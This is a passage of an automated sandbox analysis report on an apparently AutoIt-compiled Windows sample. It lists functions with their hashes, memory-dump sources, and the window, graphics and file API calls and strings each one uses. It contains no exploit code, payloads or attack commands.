                                                                • Opcode Fuzzy Hash: 01d40df523f31e646244aefc77855cac8a9c42153abb869100928d70a3bae8cb
                                                                • Instruction Fuzzy Hash: AF12B070A10609DFDF05DFA5D981AEEB3F9FF48300F50452AE806E7261EB36A964CB50
                                                                Function 002EAF50 Relevance: .5, Instructions: 514COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Exception@8Throwstd::exception::exception
                                                                • String ID:
                                                                • API String ID: 3728558374-0
                                                                • Opcode ID: 6372f44b67f486360dcf23116eb9cbf399b58001520c7ccd3d3f61b12228b304
                                                                • Instruction ID: 9cacd45d767c2f485f3dd656cc31560c2f5f35cd20ec1d5c12109e2ab855fa8c
                                                                • Opcode Fuzzy Hash: 6372f44b67f486360dcf23116eb9cbf399b58001520c7ccd3d3f61b12228b304
                                                                • Instruction Fuzzy Hash: 2802D270A10109DFCF05DF65D981AAFB7B5FF45300F518069E806EB2A5EB31DA25CB91
                                                                Function 003002A4 Relevance: .3, Instructions: 345COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                • Instruction ID: d0937b15174dbb7f42106f790d30700bc3db00ec51d2f1a9148fbe7b7b6b2011
                                                                • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                • Instruction Fuzzy Hash: 03C1C5322161970ADF6E4A3A853453EFAA15EA27B171B077DD4B3CB4D2EF20C534DA20
                                                                Function 003006D9 Relevance: .3, Instructions: 341COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                • Instruction ID: 98ccbe165afa00536c60ae33dd1eb8b8c7fa622cf8d0e84162fe9b7f14c0d54e
                                                                • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                • Instruction Fuzzy Hash: 12C1C1322161970ADF6E4639C53463EFAA15EA2BB171B077DD4B2CB4D6EF20C534DA20
                                                                Function 002FFE6F Relevance: .3, Instructions: 331COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                • Instruction ID: 513006f30fb3b25ae0ad8ee4f4608f554d4f89925fe6747525456cc64a1dc32b
                                                                • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                • Instruction Fuzzy Hash: C4C1B1322261970ADF6E4A39853453EFAA15EA27F171A077DD4B2CB4D6EF20C534DA20
                                                                Function 002FFA57 Relevance: .3, Instructions: 323COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                • Instruction ID: 53596054cb275bcb157aaf29eeda9a37e955eceb5ffa71530a2621a415cef7d6
                                                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                • Instruction Fuzzy Hash: 3BC1B33222509B09DFAD4A39C67043EFAA15EA2BF531A077DD5B2CB5D6EF20C534D620
                                                                Function 002FDA96 Relevance: .1, Instructions: 140COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5604fd53303005f1fee5bf10358449c07e86a2c6aa25d725cbc22364d45bfee4
                                                                • Instruction ID: bde80e4ee5f126eb8cf98bc2b617e424cf3f96bc61f645f8053c76cf4c8d9644
                                                                • Opcode Fuzzy Hash: 5604fd53303005f1fee5bf10358449c07e86a2c6aa25d725cbc22364d45bfee4
                                                                • Instruction Fuzzy Hash: 7A518FDA85F6C28FCB428B74ACB8085FF708F2354936A48DFC990865D7F315452ADB52
                                                                Function 00E185A0 Relevance: .1, Instructions: 92COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293967050.0000000000E14000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E14000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e14000_santi.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                • Instruction ID: 2791bbf4ad41763473b2259c06471fcd0ff5fd65537bf081f5e2c860906e675e
                                                                • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                • Instruction Fuzzy Hash: 9541B371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB50
                                                                Function 00E18430 Relevance: .0, Instructions: 35COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293967050.0000000000E14000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E14000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e14000_santi.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                • Instruction ID: 8788a811f6c32aa9251847b4adbd506ce158f69ce1d23d5ccf59f44500cb38a2
                                                                • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                • Instruction Fuzzy Hash: BD015874A01109EFCB44DF98C6909ADF7F6FF48310F648599D919A7741DB30AE81DB90
                                                                Function 00E18490 Relevance: .0, Instructions: 35COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293967050.0000000000E14000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E14000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e14000_santi.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                • Instruction ID: 0a586937dd9654c04878f236deeba006497bb10748221dcac742d28b610fe523
                                                                • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                • Instruction Fuzzy Hash: 8A01A874A01109EFCB44DF98C6909AEF7F6FF48310F208699D819A7701DB30AE41DB80
                                                                Function 00E16DE0 Relevance: .0, Instructions: 6COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293967050.0000000000E14000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E14000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e14000_santi.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                Function 0033A2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DeleteObject.GDI32(00000000), ref: 0033A2FE
                                                                • DeleteObject.GDI32(00000000), ref: 0033A310
                                                                • DestroyWindow.USER32 ref: 0033A31E
                                                                • GetDesktopWindow.USER32 ref: 0033A338
                                                                • GetWindowRect.USER32(00000000), ref: 0033A33F
                                                                • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0033A480
                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0033A490
                                                                • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0033A4D8
                                                                • GetClientRect.USER32(00000000,?), ref: 0033A4E4
                                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0033A51E
                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0033A540
                                                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0033A553
                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0033A55E
                                                                • GlobalLock.KERNEL32(00000000), ref: 0033A567
                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0033A576
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0033A57F
                                                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0033A586
                                                                • GlobalFree.KERNEL32(00000000), ref: 0033A591
                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0033A5A3
                                                                • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0036D9BC,00000000), ref: 0033A5B9
                                                                • GlobalFree.KERNEL32(00000000), ref: 0033A5C9
                                                                • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0033A5EF
                                                                • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0033A60E
                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0033A630
                                                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0033A81D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                • API String ID: 2211948467-2373415609
                                                                • Opcode ID: 23af255e5e6cc3af27c96f23d9df44cd5b815cfb025ae569e8cdfa2bedcde303
                                                                • Instruction ID: 9c45b4278cc883c534a89e4c61f30445be60efa97109199f50850dd6a7e84133
                                                                • Opcode Fuzzy Hash: 23af255e5e6cc3af27c96f23d9df44cd5b815cfb025ae569e8cdfa2bedcde303
                                                                • Instruction Fuzzy Hash: FD027C75A00214EFDB16DFA5DD89EAE7BB9FB49310F008158F905AB2A1C774ED41CB60
                                                                Function 0034D285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetTextColor.GDI32(?,00000000), ref: 0034D2DB
                                                                • GetSysColorBrush.USER32(0000000F), ref: 0034D30C
                                                                • GetSysColor.USER32(0000000F), ref: 0034D318
                                                                • SetBkColor.GDI32(?,000000FF), ref: 0034D332
                                                                • SelectObject.GDI32(?,00000000), ref: 0034D341
                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 0034D36C
                                                                • GetSysColor.USER32(00000010), ref: 0034D374
                                                                • CreateSolidBrush.GDI32(00000000), ref: 0034D37B
                                                                • FrameRect.USER32(?,?,00000000), ref: 0034D38A
                                                                • DeleteObject.GDI32(00000000), ref: 0034D391
                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 0034D3DC
                                                                • FillRect.USER32(?,?,00000000), ref: 0034D40E
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0034D439
                                                                  • Part of subcall function 0034D575: GetSysColor.USER32(00000012), ref: 0034D5AE
                                                                  • Part of subcall function 0034D575: SetTextColor.GDI32(?,?), ref: 0034D5B2
                                                                  • Part of subcall function 0034D575: GetSysColorBrush.USER32(0000000F), ref: 0034D5C8
                                                                  • Part of subcall function 0034D575: GetSysColor.USER32(0000000F), ref: 0034D5D3
                                                                  • Part of subcall function 0034D575: GetSysColor.USER32(00000011), ref: 0034D5F0
                                                                  • Part of subcall function 0034D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0034D5FE
                                                                  • Part of subcall function 0034D575: SelectObject.GDI32(?,00000000), ref: 0034D60F
                                                                  • Part of subcall function 0034D575: SetBkColor.GDI32(?,00000000), ref: 0034D618
                                                                  • Part of subcall function 0034D575: SelectObject.GDI32(?,?), ref: 0034D625
                                                                  • Part of subcall function 0034D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0034D644
                                                                  • Part of subcall function 0034D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0034D65B
                                                                  • Part of subcall function 0034D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0034D670
                                                                  • Part of subcall function 0034D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0034D698
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                • String ID:
                                                                • API String ID: 3521893082-0
                                                                • Opcode ID: 5b04e59eb41405060f90eaa0b760665a9bfac65ad3b0b2b165e1ea6859a20622
                                                                • Instruction ID: c6aba1e2c350149a8240e0b28453f01c7d2c5d9b263857064303ab842a3e347c
                                                                • Opcode Fuzzy Hash: 5b04e59eb41405060f90eaa0b760665a9bfac65ad3b0b2b165e1ea6859a20622
                                                                • Instruction Fuzzy Hash: 5F917F71908301BFC7129F64DC08A6B7BEDFF8A325F104A19F6629A1E0D7B1E944CB52
                                                                Function 002FB8FD Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DestroyWindow.USER32 ref: 002FB98B
                                                                • DeleteObject.GDI32(00000000), ref: 002FB9CD
                                                                • DeleteObject.GDI32(00000000), ref: 002FB9D8
                                                                • DestroyIcon.USER32(00000000), ref: 002FB9E3
                                                                • DestroyWindow.USER32(00000000), ref: 002FB9EE
                                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 0035D2AA
                                                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0035D2E3
                                                                • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0035D711
                                                                  • Part of subcall function 002FB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,002FB759,?,00000000,?,?,?,?,002FB72B,00000000,?), ref: 002FBA58
                                                                • SendMessageW.USER32 ref: 0035D758
                                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0035D76F
                                                                • ImageList_Destroy.COMCTL32(00000000), ref: 0035D785
                                                                • ImageList_Destroy.COMCTL32(00000000), ref: 0035D790
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                • String ID: 0
                                                                • API String ID: 464785882-4108050209
                                                                • Opcode ID: 8c0891a445a164ae64f28a020db19c89c79877e26cc4f989d02ef4be1c023a6c
                                                                • Instruction ID: e12b85c4cddf37d583d8aae0e489861ba6aecd0f9a66a69f80840763298e2f7a
                                                                • Opcode Fuzzy Hash: 8c0891a445a164ae64f28a020db19c89c79877e26cc4f989d02ef4be1c023a6c
                                                                • Instruction Fuzzy Hash: 8612AC70604205DFDB22CF24C884FA9BBE4FF09306F554569EA89CB662C771E85ACF91
                                                                Function 0032DBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetErrorMode.KERNEL32(00000001), ref: 0032DBD6
                                                                • GetDriveTypeW.KERNEL32(?,0037DC54,?,\\.\,0037DC00), ref: 0032DCC3
                                                                • SetErrorMode.KERNEL32(00000000,0037DC54,?,\\.\,0037DC00), ref: 0032DE29
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ErrorMode$DriveType
                                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                • API String ID: 2907320926-4222207086
                                                                • Opcode ID: 0056e0d65c12b048d6e58ef764161f25eb407aa5ac7c177edc40d9f36c2d1aa7
                                                                • Instruction ID: 101a35dfa83f23ad1cbaff7207186debbe4a91fd9379afe0324d2350981382f4
                                                                • Opcode Fuzzy Hash: 0056e0d65c12b048d6e58ef764161f25eb407aa5ac7c177edc40d9f36c2d1aa7
                                                                • Instruction Fuzzy Hash: 0351C27024CB62AF8B13DF14E89286AB7A4FF94705B60481AF0479F6A1CB70DD55DB42
                                                                Function 002ECC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: __wcsnicmp
                                                                • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                • API String ID: 1038674560-86951937
                                                                • Opcode ID: cfcad128a91001f3324d98d11a8230f0dfbada386f82a05468888b637c0e3a36
                                                                • Instruction ID: 1320904417c56a7de2b675ad1d69a32cd300ef338c4c08c05a1c84d320b00f9d
                                                                • Opcode Fuzzy Hash: cfcad128a91001f3324d98d11a8230f0dfbada386f82a05468888b637c0e3a36
                                                                • Instruction Fuzzy Hash: 14815D302902457BCB26AFA5DC43FFF7778AF15301F644029FD056A1C6E761DA26C690
                                                                Function 0034C6E9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0034C788
                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0034C83E
                                                                • SendMessageW.USER32(?,00001102,00000002,?), ref: 0034C859
                                                                • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0034CB15
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Window
                                                                • String ID: 0
                                                                • API String ID: 2326795674-4108050209
                                                                • Opcode ID: 0916498ced4b08cfcd5ec61c3533a37ea5bfd4a0b483e119827107927cc70787
                                                                • Instruction ID: 9b6043057dbb7e52ef2627084f9db7c6bf7fcc129034daed1600539bee73e578
                                                                • Opcode Fuzzy Hash: 0916498ced4b08cfcd5ec61c3533a37ea5bfd4a0b483e119827107927cc70787
                                                                • Instruction Fuzzy Hash: 22F10370616300AFD7638F24C889BAABBE8FF49354F08552DF589DA2A1C774EC41CB91
                                                                Function 0034638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CharUpperBuffW.USER32(?,?,0037DC00), ref: 00346449
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
